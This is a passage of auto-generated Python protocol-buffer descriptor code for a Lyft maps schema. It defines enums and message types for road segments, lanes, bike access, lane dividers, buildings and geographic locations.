\x03(\x0b\x32-.pb.lyft.maps.MapElement.AssociatedConditions\x12;\n\ndebug_info\x18\x06 
\x03(\x0b\x32\'.pb.lyft.maps.MapElement.DebugInfoEntry\x12\x16\n\x0eservice_region\x18\x07 \x01(\t\x1a\x84\x03\n\x07\x45lement\x12\x33\n\x07segment\x18\x01 \x01(\x0b\x32 .pb.lyft.maps.RoadNetworkSegmentH\x00\x12-\n\x04node\x18\x02 \x01(\x0b\x32\x1d.pb.lyft.maps.RoadNetworkNodeH\x00\x12\"\n\x04lane\x18\x03 \x01(\x0b\x32\x12.pb.lyft.maps.LaneH\x00\x12\x46\n\x17traffic_control_element\x18\x04 \x01(\x0b\x32#.pb.lyft.maps.TrafficControlElementH\x00\x12*\n\x08junction\x18\x05 \x01(\x0b\x32\x16.pb.lyft.maps.JunctionH\x00\x12\x39\n\x10segment_sequence\x18\x06 \x01(\x0b\x32\x1d.pb.lyft.maps.SegmentSequenceH\x00\x12\x37\n\x0f\x61nnotated_shape\x18\x08 \x01(\x0b\x32\x1c.pb.lyft.maps.AnnotatedShapeH\x00\x42\t\n\x07\x65lement\x1ax\n\x14\x41ssociatedConditions\x12+\n\nconditions\x18\x01 \x03(\x0b\x32\x17.pb.lyft.maps.Condition\x12\x33\n\toverrides\x18\x02 \x01(\x0b\x32 .pb.lyft.maps.MapElement.Element\x1a\x30\n\x0e\x44\x65\x62ugInfoEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"G\n\x0bMapFragment\x12\x0c\n\x04name\x18\x01 \x01(\t\x12*\n\x08\x65lements\x18\x02 \x03(\x0b\x32\x18.pb.lyft.maps.MapElementB\x06Z\x04mapsb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_descriptor__pb2.DESCRIPTOR,google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,])
_ACCESSRESTRICTION_TYPE = _descriptor.EnumDescriptor(
name='Type',
full_name='pb.lyft.maps.AccessRestriction.Type',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NO_RESTRICTION', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONLY_HOV', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONLY_BUS', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONLY_BIKE', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONLY_TURN', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=587,
serialized_end=684,
)
_sym_db.RegisterEnumDescriptor(_ACCESSRESTRICTION_TYPE)
_DAILYTIMEINTERVAL_DAYOFTHEWEEK = _descriptor.EnumDescriptor(
name='DayOfTheWeek',
full_name='pb.lyft.maps.DailyTimeInterval.DayOfTheWeek',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='SUNDAY', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MONDAY', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TUESDAY', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='WEDNESDAY', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='THURSDAY', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FRIDAY', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SATURDAY', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=884,
serialized_end=990,
)
_sym_db.RegisterEnumDescriptor(_DAILYTIMEINTERVAL_DAYOFTHEWEEK)
_ROADNETWORKSEGMENT_LANESET_BIKELANEACCESS = _descriptor.EnumDescriptor(
name='BikeLaneAccess',
full_name='pb.lyft.maps.RoadNetworkSegment.LaneSet.BikeLaneAccess',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_BIKE_ACCESS', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NO', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DESIGNATED', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DESIGNATED_BACKWARDS', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DESIGNATED_SHARED', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=2376,
serialized_end=2502,
)
_sym_db.RegisterEnumDescriptor(_ROADNETWORKSEGMENT_LANESET_BIKELANEACCESS)
_ROADNETWORKSEGMENT_ROADCLASS = _descriptor.EnumDescriptor(
name='RoadClass',
full_name='pb.lyft.maps.RoadNetworkSegment.RoadClass',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_ROAD_CLASS', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MOTORWAY', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRUNK', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PRIMARY', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SECONDARY', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TERTIARY', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='RESIDENTIAL', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='UNCLASSIFIED', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_PARKING_AISLE', index=9, number=9,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_DRIVEWAY', index=10, number=10,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_ALLEY', index=11, number=11,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_EMERGENCY_ACCESS', index=12, number=12,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_DRIVE_THROUGH', index=13, number=13,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MOTORWAY_LINK', index=14, number=14,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRUNK_LINK', index=15, number=15,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PRIMARY_LINK', index=16, number=16,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SECONDARY_LINK', index=17, number=17,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TERTIARY_LINK', index=18, number=18,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SERVICE_LIVING_STREET', index=19, number=19,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PEDESTRIAN', index=20, number=20,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PATH', index=21, number=21,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='STEPS', index=22, number=22,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CYCLEWAY', index=23, number=23,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=2505,
serialized_end=2950,
)
_sym_db.RegisterEnumDescriptor(_ROADNETWORKSEGMENT_ROADCLASS)
_ROADNETWORKSEGMENT_TRAVELDIRECTION = _descriptor.EnumDescriptor(
name='TravelDirection',
full_name='pb.lyft.maps.RoadNetworkSegment.TravelDirection',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_TRAVEL_DIRECTION', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TWO_WAY', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONE_WAY_FORWARD', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONE_WAY_BACKWARD', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ONE_WAY_REVERSIBLE', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=2952,
serialized_end=3079,
)
_sym_db.RegisterEnumDescriptor(_ROADNETWORKSEGMENT_TRAVELDIRECTION)
_ROADNETWORKSEGMENT_SIDEOFSEGMENT = _descriptor.EnumDescriptor(
name='SideOfSegment',
full_name='pb.lyft.maps.RoadNetworkSegment.SideOfSegment',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_SIDE_OF_SEGMENT', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='EITHER_SIDE_OF_SEGMENT', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SEGMENT_LEFT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SEGMENT_RIGHT', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NEITHER_SIDE_OF_SEGMENT', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=3082,
serialized_end=3220,
)
_sym_db.RegisterEnumDescriptor(_ROADNETWORKSEGMENT_SIDEOFSEGMENT)
_ROADNETWORKSEGMENT_BIKEACCESS = _descriptor.EnumDescriptor(
name='BikeAccess',
full_name='pb.lyft.maps.RoadNetworkSegment.BikeAccess',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NOT_ALLOWED', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ALLOWED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARED', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DEDICATED', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PROTECTED', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=3222,
serialized_end=3319,
)
_sym_db.RegisterEnumDescriptor(_ROADNETWORKSEGMENT_BIKEACCESS)
_LANE_BOUNDARY_DIVIDERTYPE = _descriptor.EnumDescriptor(
name='DividerType',
full_name='pb.lyft.maps.Lane.Boundary.DividerType',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='NONE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SINGLE_YELLOW_SOLID', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SINGLE_WHITE_SOLID', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SINGLE_YELLOW_DASHED', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SINGLE_WHITE_DASHED', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DOUBLE_YELLOW_SOLID', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DOUBLE_WHITE_SOLID', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DOUBLE_YELLOW_SOLID_FAR_DASHED_NEAR', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DOUBLE_YELLOW_DASHED_FAR_SOLID_NEAR', index=9, number=9,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CURB_RED', index=10, number=10,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CURB_YELLOW', index=11, number=11,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CURB', index=12, number=12,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=4482,
serialized_end=4790,
)
_sym_db.RegisterEnumDescriptor(_LANE_BOUNDARY_DIVIDERTYPE)
_LANE_TURNTYPE = _descriptor.EnumDescriptor(
name='TurnType',
full_name='pb.lyft.maps.Lane.TurnType',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='THROUGH', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LEFT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARP_LEFT', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='RIGHT', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARP_RIGHT', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='U_TURN', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=4792,
serialized_end=4894,
)
_sym_db.RegisterEnumDescriptor(_LANE_TURNTYPE)
_TRAFFICCONTROLELEMENT_GEOMETRYTYPE = _descriptor.EnumDescriptor(
name='GeometryType',
full_name='pb.lyft.maps.TrafficControlElement.GeometryType',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='POINT', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MULTI_POINT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LINESTRING', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='POLYGON', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10237,
serialized_end=10320,
)
_sym_db.RegisterEnumDescriptor(_TRAFFICCONTROLELEMENT_GEOMETRYTYPE)
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION_ORIENTATION = _descriptor.EnumDescriptor(
name='Orientation',
full_name='pb.lyft.maps.SegmentSequence.SegmentWithOrientation.Orientation',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORWARD', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKWARD', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10633,
serialized_end=10686,
)
_sym_db.RegisterEnumDescriptor(_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION_ORIENTATION)
_SEGMENTSEQUENCE_TYPE = _descriptor.EnumDescriptor(
name='Type',
full_name='pb.lyft.maps.SegmentSequence.Type',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORBIDDEN', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MANDATORY', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10688,
serialized_end=10737,
)
_sym_db.RegisterEnumDescriptor(_SEGMENTSEQUENCE_TYPE)
_ANNOTATEDSHAPE_BUILDING_TYPE = _descriptor.EnumDescriptor(
name='Type',
full_name='pb.lyft.maps.AnnotatedShape.Building.Type',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='COMMERCIAL', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='RESIDENTIAL', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSPORTATION', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='HOSPITAL', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='EVENT', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PARKING_STRUCTURE', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='RELIGIOUS', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='EDUCATIONAL', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='GOVERNMENTAL', index=9, number=9,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=11570,
serialized_end=11740,
)
_sym_db.RegisterEnumDescriptor(_ANNOTATEDSHAPE_BUILDING_TYPE)
_GLOBALID = _descriptor.Descriptor(
name='GlobalId',
full_name='pb.lyft.maps.GlobalId',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pb.lyft.maps.GlobalId.id', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=99,
serialized_end=121,
)
_GEOLOCATION = _descriptor.Descriptor(
name='GeoLocation',
full_name='pb.lyft.maps.GeoLocation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='lat_e7', full_name='pb.lyft.maps.GeoLocation.lat_e7', index=0,
number=1, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lng_e7', full_name='pb.lyft.maps.GeoLocation.lng_e7', index=1,
number=2, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='altitude_cm', full_name='pb.lyft.maps.GeoLocation.altitude_cm', index=2,
number=3, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Altitude', full_name='pb.lyft.maps.GeoLocation.Altitude',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=123,
serialized_end=203,
)
_GEOFRAME = _descriptor.Descriptor(
name='GeoFrame',
full_name='pb.lyft.maps.GeoFrame',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='origin', full_name='pb.lyft.maps.GeoFrame.origin', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bearing_degrees', full_name='pb.lyft.maps.GeoFrame.bearing_degrees', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=205,
serialized_end=283,
)
_LOCALIZEDSTRING = _descriptor.Descriptor(
name='LocalizedString',
full_name='pb.lyft.maps.LocalizedString',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='language_code', full_name='pb.lyft.maps.LocalizedString.language_code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='pb.lyft.maps.LocalizedString.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=285,
serialized_end=340,
)
_ROADNETWORKNODE = _descriptor.Descriptor(
name='RoadNetworkNode',
full_name='pb.lyft.maps.RoadNetworkNode',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='location', full_name='pb.lyft.maps.RoadNetworkNode.location', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='road_segments', full_name='pb.lyft.maps.RoadNetworkNode.road_segments', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='z_level', full_name='pb.lyft.maps.RoadNetworkNode.z_level', index=2,
number=3, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='junction', full_name='pb.lyft.maps.RoadNetworkNode.junction', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=343,
serialized_end=511,
)
_ACCESSRESTRICTION = _descriptor.Descriptor(
name='AccessRestriction',
full_name='pb.lyft.maps.AccessRestriction',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='pb.lyft.maps.AccessRestriction.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_ACCESSRESTRICTION_TYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=514,
serialized_end=684,
)
_DAILYTIMEINTERVAL = _descriptor.Descriptor(
name='DailyTimeInterval',
full_name='pb.lyft.maps.DailyTimeInterval',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='day_of_the_week', full_name='pb.lyft.maps.DailyTimeInterval.day_of_the_week', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='start_local_time_seconds', full_name='pb.lyft.maps.DailyTimeInterval.start_local_time_seconds', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='end_local_time_seconds', full_name='pb.lyft.maps.DailyTimeInterval.end_local_time_seconds', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
